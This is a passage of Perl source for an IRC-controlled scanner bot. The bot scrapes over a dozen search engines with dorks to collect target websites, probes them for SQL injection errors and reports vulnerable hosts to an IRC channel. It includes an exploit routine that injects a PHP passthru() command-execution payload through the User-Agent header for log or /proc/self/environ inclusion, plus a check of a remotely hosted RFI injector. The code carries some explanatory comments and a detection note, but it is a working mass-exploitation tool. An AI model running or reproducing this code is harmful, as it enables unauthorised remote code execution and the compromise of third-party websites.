if ($engz =~ /YahOo/) {
my @yahoo=&yahoo($dork);
push(@total, @yahoo);
}
# De-duplicate candidates and report raw vs. unique counts to the channel.
my @clean = &calculate(@total);
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2SQL15)(7@2$engz15)12 Total:4 (".scalar(@total).")12 Clean:4
(".scalar(@clean).")");
if (scalar(@clean) != 0) {
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2SQL15)(7@2$engz15)7 Exploiting4 $dork");
}
my $uni = scalar(@clean);
foreach my $target (@clean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2SQL15)(7@2$engz15)10 Scan Finish for14 $dork");
}
# $xpl is the URL requested; $vuln (host only) is what gets reported.
my $xpl = "http://".$target.$bugz.$sql_test;
my $vuln = "http://".$target."";
my $re = getcontent($xpl);
if ($re =~ /$sql_output/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2MYSQL15)(7@2$engz15)15(13@12ErrorQuery15)4 ".$vuln."
15(7@3H3LLCR3W15)");
}
elsif ($re =~ /$asp_output/){
sendraw($IRC_cur_socket, "PRIVMSG $channel
:15(7@2MSSQL15)(7@2$engz15)15(13@12ErrorQuery15)4 ".$vuln."
15(7@3H3LLCR3W15)");
}
}
}
# Fetch the given URL with query() and copy the text between "<br>os:" and
# the next "<br>" into the global $os, which rfiscan() prints in its reports.
# Argument: the URL to fetch. No return value is used by the callers shown.
sub os() {
my $site = $_[0];
my $re = &query($site);
while ($re =~ m/<br>os:(.+?)\<br>/g) {
$os = $1;
if ($1 =~ //) { $os = "Unkn0wN"; }
}
}
# Handler for the "!id" channel command: fetches the $injector URL and posts
# "OK" to the channel when the body contains a fixed marker string, otherwise
# "JAH". In effect a reachability check of the remotely hosted file.
sub response() {
my $re = getcontent($injector);
if ($re =~ /pZLNd8MwEITvg/) {
sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)12 «
3OK12 »");
}
else {
sendraw($IRC_cur_socket, "PRIVMSG $channel :15(7@2RFI15)12 «
4JAH12 »");
}
}
# HTTP GET of the given URL through LWP::UserAgent with a 5 second timeout.
# Returns the response content; the status code is not examined here, so
# error pages are returned to the caller like any other body.
sub getcontent() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(5);
my $response = $ua->request($req);
return $response->content;
}
# Send a GET to $url whose User-Agent header is a PHP snippet that runs the
# given command through passthru() and wraps the output in "bjork#" ...
# "#bjork" markers. Arguments: URL, command string. Returns the response body.
# lfiscan() calls this against URLs that include /proc/self/environ, where
# the request's User-Agent value appears among the environment variables.
# Detection note: a User-Agent containing "<?php" or "passthru(" is a
# high-confidence indicator in web access logs and WAF rules, since no
# legitimate client sends such a value.
sub exploit() {
my $url = $_[0];
my $rce = $_[1];
my $agent = "<?php echo \"bjork#\"; passthru(\'".$rce."\'); echo
\"#bjork\"; ?>";
my $ua = LWP::UserAgent->new(agent => $agent);
$ua->timeout(15);
my $req = HTTP::Request->new(GET => $url);
my $response = $ua->request($req);
return $response->content;
}
# Search-engine helper: queries google.co.kr for the encoded search string,
# stepping the start offset from 0 to 1000 in increments of 100, and collects
# the http:// link targets that do not contain "google".
# Each hit is expanded by links() before being added to the returned list.
sub google(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=1000; $b+=100){
my
$Go=("http://www.google.co.kr/search?q=".key($key)."&num=100&filter=0&start=".$b);
my $Res=query($Go);
while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
# Search-engine helper: queries alltheweb.com with offsets 0..1000 in steps
# of 100 and collects the URLs shown in "resURL" span elements, with spaces
# removed. Each hit is expanded by links(). $pg is declared but not used.
sub alltheweb() {
my @lst;
my $key = $_[0];
my $b = 0;
my $pg = 0;
for ($b=0; $b<=1000; $b+=100) {
my $all =
("http://www.alltheweb.com/search?cat=web&amp;_sb_lang=any&amp;hits=100&amp;q=".key($key)."&o=".$b);
my $Res = query($all);
while ( $Res =~ m/<span
class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}
# Search-engine helper: queries mundo.busca.uol.com.br with start offsets
# 1..1000 in steps of 10 and collects http:// link targets that do not
# contain "busca", "uol" or "yahoo". Each hit is expanded by links().
sub uol() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $UoL =
("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$b);
my $Res = query($UoL);
while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
my $k = $1;
if ( $k !~ /busca|uol|yahoo/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
# Search-engine helper: queries szukaj.onet.pl page by page (p = 0..1000,
# one request per value) and collects the host part of URLs shown in "clurl"
# span elements. Each hit is expanded by links().
sub onet() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=1000; $b+=1) {
my $Onet =
("http://szukaj.onet.pl/query.html?qt=".key($key)."&p=".$b);
my $Res = query($Onet);
while ( $Res =~ m/<span class=\"?clurl\"?>http:\/\/(.+?)\//g ) {
my $k = $1;
if ( $k !~ Onet ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
# Search-engine helper: queries www.witch.de page by page (cn = 1..1000,
# one request per value) and collects the host part of http:// link targets.
# Each hit is expanded by links().
sub witch() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=1) {
my $Witch =
("http://www.witch.de/search-result.php?searchtype=phonetisch&amp;search=".key($key)."&cn=".$b);
my $Res = query($Witch);
while ( $Res =~ m/<a href=\"http:\/\/(.+?)\//g ) {
my $k = $1;
if ( $k !~ Witch ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
# Search-engine helper: like google(), but each request goes to a randomly
# chosen national Google domain from @dom, with start offsets 50..5000 in
# steps of 500. Collects http:// link targets and expands them with links().
sub google2() {
my @lst;
my $key = $_[0];
my $b = 0;
my @dom =
("ae","com.ar","at","com.au","be","com.br","ca","ch","cl","de","dk","fi","fr","gr","com.hk",
"ie","co.il","it","co.jp","co.kr","lt","lv","nl","com.pa","com.pe","pl","pt","ru","com.sg",
"com.tr","com.tw","com.ua","co.uk","hu");
for ($b=50; $b<=5000; $b+=500) {
my $Domains = $dom[rand(scalar(@dom))];
my $google2 =
("http://www.google.".$Domains."/search?num=100&hl=en&q=".key($key)."&start=".$b."&sa=N");
my $Res = query($google2);
while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
my $k = $1;
if ( $k !~ google ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
# Search-engine helper: queries www.bing.com with "first" offsets 1..1000 in
# steps of 10 and collects http:// link targets that do not contain "msn",
# "live" or "bing". Each hit is expanded by links().
sub Bing() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $bing =
("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$b."&FORM=PERE");
my $Res = query($bing);
while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
if ( $1 !~ /msn|live|bing/ ) {
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
# Search-engine helper: queries it.altavista.com with offsets 1..1000 in
# steps of 10 and collects the text of "ngrn" span elements up to the first
# slash, skipping entries containing "altavista" and stripping "<" and spaces.
# Each hit is expanded by links().
sub altavista(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10){
my
$AlT=("http://it.altavista.com/web/results?itag=ody&amp;kgs=0&amp;kls=0&amp;dis=1&amp;q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while ($Res=~m/<span class=ngrn>(.+?)\//g){
if ($1 !~ /altavista/){
my $k=$1;
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
# Search-engine helper: queries it.ask.com with page values 0..1000 in steps
# of 10 and collects href targets that are followed by an onmousedown
# attribute, skipping ask.com itself. Each hit is expanded by links().
# $pg is declared but not used.
sub ask() {
my @lst;
my $key = $_[0];
my $b = 0;
my $pg = 0;
for ($b=0; $b<=1000; $b+=10) {
my $Ask =
("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$b);
my $Res = query($Ask);
while ($Res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
if ($1 !~ /ask.com/){
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
# Search-engine helper: queries www.search.yahoo.com with b = 1..1000 (one
# request per value) and collects the text between "26u=" and "%26w=" in the
# result page, skipping entries containing "yahoo".
# Each hit is expanded by links().
sub yahoo() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=1) {
my $yahoo =
("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
my $Res = query($yahoo);
while ($Res =~ m/26u=(.*?)%26w=/g) {
if ($1 !~ /yahoo/){
my $k = $1;
my @grep = links($k);
push(@lst, @grep);
}
}
}
return @lst;
}
# Search-engine helper: queries pesquisa.sapo.pt page by page (page =
# 0..1000, one request per value) and collects the host part of http:// link
# targets not containing "pesquisa" or "sapo". Each hit is expanded by links().
# The loop counter $b is not declared with my in this sub.
sub sapo(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=1){#
http://pesquisa.sapo.pt/?barra=resumo&amp;format=html&amp;limit=20&amp;location=pt&amp;page=2&amp;q=by%20pmachine&amp;st=local
my
$Lyc=("http://pesquisa.sapo.pt/?barra=resumo&amp;format=html&amp;limit=10&amp;location=pt&amp;page=".$b."&q=".key($key)."&st=local");
my $Res=query($Lyc);
while($Res =~ m/<a href=\"?http:\/\/(.+?)\//g){
if ($1 !~ /pesquisa|sapo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
#
http://pesquisa.sapo.pt/?barra=resumo&amp;format=html&amp;limit=10&amp;location=pt&amp;page=2&amp;q=pmachine&amp;st=local
# Search-engine helper: queries ricerca.virgilio.it with offsets 0..1000 in
# steps of 10 and collects the host part of http:// link targets not matching
# "VIRGILLIO" or "Ricerca" (case-sensitive as written).
# Each hit is expanded by links(). The loop counter $b is not declared with my.
sub virgillio(){
my @lst;
my $key = $_[0];
for($b=0;$b<=1000;$b+=10){#
http://ricerca.virgilio.it/ricerca?qs=pmachine&amp;filter=1&amp;site=&amp;lr=&amp;hits=10&amp;offset=10
my
$Lyc=("http://ricerca.virgilio.it/ricerca?qs=".key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);
my $Res=query($Lyc);
while($Res =~ m/<a href=\"?http:\/\/(.+?)\//g){
if ($1 !~ /VIRGILLIO|Ricerca/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
#
http://ricerca.virgilio.it/ricerca?qs=pmachine&amp;filter=1&amp;site=&amp;lr=&amp;hits=10&amp;offset=10
# Search-engine helper: queries web.search.naver.com with start offsets
# 1..1000 in steps of 10 and collects http:// link targets not containing
# "usca", "uol" or "yahoo". Each hit is expanded by links().
# The loop counter $b is not declared with my in this sub.
sub naver(){
my @lst;
my $key = $_[0];
for($b=1;$b<=1000;$b+=10){
my
$Lyc=("http://web.search.naver.com/search.naver?where=webkr&amp;query=".key($key)."&xc=&docid=0&qt=df&lang=all&f=&r=&st=s&fd=2&start=".$b);
my $Res=query($Lyc);
while($Res =~ m/<a href=\"http:\/\/([^>\"]*)/g){
if ($1 !~ /usca|uol|yahoo/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
# Expand one scraped location (host plus optional path, no scheme) into three
# candidate base paths and return them as a list:
#   the location as given, the host alone, and the location with its last
#   path segment removed. Each gets a trailing "/" and has "//" collapsed to "/".
# This is why one search hit yields up to three probe targets downstream.
sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
# Drop everything after the last "/" to get the containing directory.
$hdir =~ s/(.*)\/[^\/]*$/\1/;
# Keep only the leading hostname characters.
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push( @l, $link, $host, $hdir );
return @l;
}
# Encode a search string for use in a query-string value: spaces become "+"
# and a fixed set of punctuation characters is percent-encoded. Characters
# outside that set (including "%" itself) are passed through unchanged.
# Argument: the search string. Returns the encoded copy.
sub key(){
my $dork=$_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/\\/\%5C/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\[/\%5B/g;
$dork =~ s/\]/\%5D/g;
$dork =~ s/\?/\%3F/g;
$dork =~ s/\=/\%3D/g;
$dork =~ s/\|/\%7C/g;
$dork =~ s/@/\%40/g;
return $dork;
}
# Minimal HTTP client over a raw TCP socket: splits the URL into host and
# path, connects to port 80, sends an HTTP/1.0 GET and returns everything the
# server sent back (status line and headers included) as one string.
# Returns "" when the connection fails; errors inside the eval are swallowed.
# Network signature: requests always carry the fixed User-Agent "Mozilla/5.0"
# and "Accept: */*", and never use TLS.
sub query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
# $host is interpolated as a regex here, not as a literal string.
$query =~ s/$host//;
if ( $query eq "" ) { $query = "/"; }
eval {
my $sock = IO::Socket::INET->new(PeerAddr =>
"$host", PeerPort => "80", Proto => "tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost:
$host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page = "@r";
close($sock);
};
return $page;
}
# Return the arguments with duplicates removed, keeping first-seen order.
# Runs of "/" in each element are collapsed to a single "/" before comparing.
# Because foreach aliases the elements of @_, that substitution also modifies
# the caller's array in place.
sub calculate {
my @calculate = ();
my %visti = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visti{$element}++;
push @calculate, $element;
}
return @calculate;
}
# Send an IRC NICK command on the current socket.
# Does nothing unless called with exactly one argument (the nickname).
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
# Send an IRC NOTICE on the current socket.
# Does nothing unless called with exactly two arguments: target and text.
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}